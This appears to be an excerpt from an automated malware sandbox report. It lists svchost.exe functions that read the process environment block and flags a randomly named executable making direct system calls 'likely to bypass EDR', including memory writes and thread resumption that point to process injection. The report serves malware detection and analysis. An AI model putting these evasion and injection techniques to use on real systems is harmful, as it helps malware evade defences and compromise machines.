Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]	2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]	2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]	2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]	2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]	2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]	2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]	2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]	2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]	2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]	2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]	2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]	2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]	2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]	2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]	2_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]	2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]	2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]	2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]	2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]	2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]	2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]	2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]	2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]	2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]	2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]	2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]	2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]	2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]	2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]	2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]	2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_006280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006280A9

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005FA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_005FA155
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005FA124 SetUnhandledExceptionFilter,		0_2_005FA124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
